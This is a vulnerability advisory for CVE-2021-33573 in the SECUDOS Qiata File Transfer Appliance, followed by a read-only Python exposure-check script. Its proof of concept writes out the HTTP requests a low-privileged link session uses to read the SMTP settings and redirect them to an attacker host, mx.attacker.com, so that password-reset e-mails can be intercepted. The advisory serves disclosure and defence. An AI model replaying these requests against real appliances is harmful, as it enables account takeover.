SECUDOS Qiata FTA mail settings access control vulnerability


CVE-2021-33573

Type

  • Access control

Severity

  • Medium

Affected products

  • SECUDOS Qiata File Transfer Appliance

Remediation

  • Update the FTA to version 2.21.0.

Credits

  • Vulnerability discovered by William Söderberg of F-Secure Labs and F-Secure Consulting.

Timeline

  • 2021-04-14  Notified Secudos about the identified vulnerability
  • 2021-04-15  Vendor acknowledged issue
  • 2021-04-26  Patch released in version 2.21.0
  • 2021-08-24  F-Secure publishes advisory

Description

F-Secure identified an access control vulnerability in the Secudos Qiata File Transfer Appliance (FTA). The issue allows a low-privileged attacker to escalate their privileges on the system and gain unauthorized access to files and functionality.

Secudos describes the software as follows: “Qiata File Transfer Appliances (FTAs) provide the ability to easily and securely exchange files with internal or external users. Qiata is a user-friendly solution in the form of a specialized web application that is optimized for the task of file transfer. Qiata is not some service on the internet. Qiata is an appliance solution that operates within the enterprise itself.”

F-Secure found that both low-privileged internal and external users could read and change the SMTP settings of the FTA, a function that should be reserved for administrators.

Impact

Low-privileged users can escalate privileges in the system. By changing the SMTP settings so that e-mails are delivered to an attacker-controlled server, the attacker can initiate a password reset for a victim user, read the reset e-mail, and subsequently change the victim user’s password.

Proof of concept

In order to carry out the attack, the attacker must first be authenticated to the system. In a plausible narrative, the attacker might have received a link to a file sent from the FTA, which provides an external user session on the Qiata FTA:

GET /cgi-bin/login.fcgi?link=d7d2d6c1-67f1-4f81-839a-73aca4d405b9 HTTP/1.1
Host: 192.168.17.128

The response body contains the “tokenValue”, which serves as the session identifier on the FTA; the same value is also set as the FTAUser cookie:

HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-UA-Compatible: IE=EDGE
Set-Cookie: FTALink=d7d2d6c1-67f1-4f81-839a-73aca4d405b9;Path=/;Expires=Thu, 04-Mar-2021 14:46:04 GMT;HttpOnly;Secure
Set-Cookie: FTALink=d7d2d6c1-67f1-4f81-839a-73aca4d405b9;Path=/;Expires=Thu, 04-Mar-2021 14:46:04 GMT;HttpOnly;Secure
Set-Cookie: FTAUser=8ddd3e2b-73a4-4949-8173-908e38aa7f19;Path=/;Expires=Thu, 04-Mar-2021 14:46:04 GMT;HttpOnly;Secure
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: master-only
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 12416

SECUDOS Qiata File Transfer Service - Transfer Download Seite [... omitted for brevity]

The FTAUser value is then supplied as the X_CSRF_Token header in a request to the transfers.fcgi endpoint that fetches the SMTP settings data source (“smtpDataSource0”), an operation a link-based external session should not be permitted to perform:

POST /cgi-bin/transfers.fcgi?isc_dataFormat=xml HTTP/1.1
Host: 192.168.17.128
Content-Length: 645
X_CSRF_Token: 8ddd3e2b-73a4-4949-8173-908e38aa7f19
Content-Type: text/xml
Accept: */*

1f0321fc-e9f5-11de-8199-00248c819310  smtpDataSource0  fetch  smtpForm1

This returns the SMTP settings, including the existing SMTP server address (“smtpAddress”), as seen below:

HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: master-only
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
Content-Length: 558
Connection: close
Content-Type: text/xml

0  0  1  1  1f0321fc-e9f5-11de-8199-00248c819310  192.168.17.100  25  false  FTA  fta@f-secure.com  false  true

The SMTP settings are then updated to send e-mails to an attacker-controlled server (“mx.attacker.com”) using the same endpoint, this time with an “update” operation:

POST /cgi-bin/transfers.fcgi?isc_dataFormat=xml HTTP/1.1
Host: 192.168.17.128
Content-Length: 645
X_CSRF_Token: 8ddd3e2b-73a4-4949-8173-908e38aa7f19
Content-Type: text/xml
Accept: */*

1f0321fc-e9f5-11de-8199-00248c819310  mx.attacker.com  FTA  fta@f-secure.com  false  true  false  smtpDataSource0  update  smtpForm1

The 200 response code and the response body, which now echoes “mx.attacker.com” as the SMTP server address, confirm that the settings have been updated:

HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: master-only
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
Content-Type: text/xml
Content-Length: 491

0  1f0321fc-e9f5-11de-8199-00248c819310  mx.attacker.com  25  false  FTA  fta@f-secure.com  false

With the mail server reconfigured, the attacker can initiate a password reset for a target user, read the reset e-mail on the attacker-controlled server and take over the account. Once the attack has concluded, the same request can be used to restore the original SMTP settings (which the earlier “fetch” response disclosed) in order to avoid raising suspicion.
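The following script is an added example and is not F-Secure’s proof-of-concept code nor anything shipped by SECUDOS. It gives an operator a read-only way to confirm whether an appliance is still exposed before patching: it replays only the first two steps above (link login, then a “fetch” of smtpDataSource0 with the FTAUser value as X_CSRF_Token) and never sends an “update”, so no setting is changed. Two assumptions are built in and labelled in the code: the request and response XML framing is taken to be SmartClient’s RestDataSource format (this page preserves only the values of the XML bodies, not the element names, so they may differ on a real appliance), and in the constructed sample response only “smtpAddress” is a field name the advisory mentions; the other field names are placeholders.

```python
"""Read-only exposure check for the Qiata FTA SMTP-settings access control issue.

Added example, not F-Secure's proof-of-concept code and not SECUDOS code. It
replays only the first two steps of the advisory (link login, then a 'fetch'
of smtpDataSource0) and never issues an 'update', so nothing on the appliance
is changed. ASSUMPTION: the XML framing is SmartClient RestDataSource XML
(<request>/<response>, <data>, <record>); the advisory page preserves only the
values, not the element names, so they may differ on a real appliance.
"""
import http.client
import re
import ssl
import sys
import xml.etree.ElementTree as ET

# Record id of the SMTP settings as seen in the advisory's requests.
SMTP_RECORD_ID = "1f0321fc-e9f5-11de-8199-00248c819310"

# Constructed sample response modelled on the values in the advisory. Only
# "smtpAddress" is a field name the advisory mentions; the others are placeholders.
SAMPLE_RESPONSE = (
    "<response><status>0</status><startRow>0</startRow><endRow>1</endRow>"
    "<totalRows>1</totalRows><data><record>"
    f"<id>{SMTP_RECORD_ID}</id><smtpAddress>192.168.17.100</smtpAddress>"
    "<smtpPort>25</smtpPort><smtpName>FTA</smtpName>"
    "<smtpFrom>fta@f-secure.com</smtpFrom></record></data></response>"
)


def session_from_cookies(set_cookie_headers):
    """Extract FTALink/FTAUser from the link login's Set-Cookie headers.
    The advisory reuses the FTAUser value as the X_CSRF_Token header."""
    found = {}
    for hdr in set_cookie_headers:
        m = re.match(r"\s*(FTALink|FTAUser)=([^;]+)", hdr)
        if m:
            found[m.group(1)] = m.group(2)
    return found if "FTAUser" in found else None


def build_fetch_request(record_id=SMTP_RECORD_ID):
    """DSRequest (assumed SmartClient framing) that only reads the record."""
    return (
        "<request>"
        f"<data><id>{record_id}</id></data>"
        "<dataSource>smtpDataSource0</dataSource>"
        "<operationType>fetch</operationType>"
        "<componentId>smtpForm1</componentId>"
        "</request>"
    )


def parse_smtp_settings(xml_text):
    """Return (status, fields) from a DSResponse. status 0 means the appliance
    served the record; fields maps child element names of <record> to text."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return -1, {}
    status = int(root.findtext("status", default="-1"))
    record = root.find("data/record")
    fields = {} if record is None else {c.tag: (c.text or "") for c in record}
    return status, fields


def is_exposed(status, fields):
    """A session obtained from a download link should never see the SMTP server."""
    return status == 0 and bool(fields.get("smtpAddress"))


def check(host, link_token, verify_tls=True):
    """Live check against an appliance. Returns (status, fields), or None when
    the link login issued no FTAUser cookie. This is the only networked part."""
    ctx = ssl.create_default_context()
    if not verify_tls:  # appliances commonly run self-signed certificates
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, context=ctx, timeout=15)
    conn.request("GET", f"/cgi-bin/login.fcgi?link={link_token}")
    login = conn.getresponse()
    login.read()
    session = session_from_cookies(login.headers.get_all("Set-Cookie") or [])
    if session is None:
        return None
    # http.client sends header names verbatim, preserving the X_CSRF_Token spelling.
    headers = {
        "X_CSRF_Token": session["FTAUser"],
        "Cookie": f"FTALink={session.get('FTALink', '')}; FTAUser={session['FTAUser']}",
        "Content-Type": "text/xml",
        "Accept": "*/*",
    }
    conn.request("POST", "/cgi-bin/transfers.fcgi?isc_dataFormat=xml",
                 body=build_fetch_request().encode(), headers=headers)
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", "replace")
    if resp.status != 200:
        return resp.status, {}
    return parse_smtp_settings(body)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: check_fta_smtp.py <host> <link-guid>")
    result = check(sys.argv[1], sys.argv[2], verify_tls=False)
    if result is None:
        print("no FTAUser session issued for that link")
    else:
        st, fl = result
        print("EXPOSED" if is_exposed(st, fl) else "not exposed", st, fl.get("smtpAddress"))
```

A patched appliance should answer the fetch from a link session with a non-zero status or without a record, so is_exposed() returns False; a status 0 response that carries an smtpAddress is the condition the advisory describes. Run it only against appliances you are authorised to test, and after patching repeat the check rather than trusting the version banner alone.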

Workaround

Restrict outbound SMTP traffic from the FTA to the Internet, permitting SMTP connections only to an allow-list of known mail relays. This keeps password reset e-mails from reaching an external attacker-controlled server, but it does not stop low-privileged users from reading or changing the SMTP settings themselves; updating the FTA to version 2.21.0 remains the fix.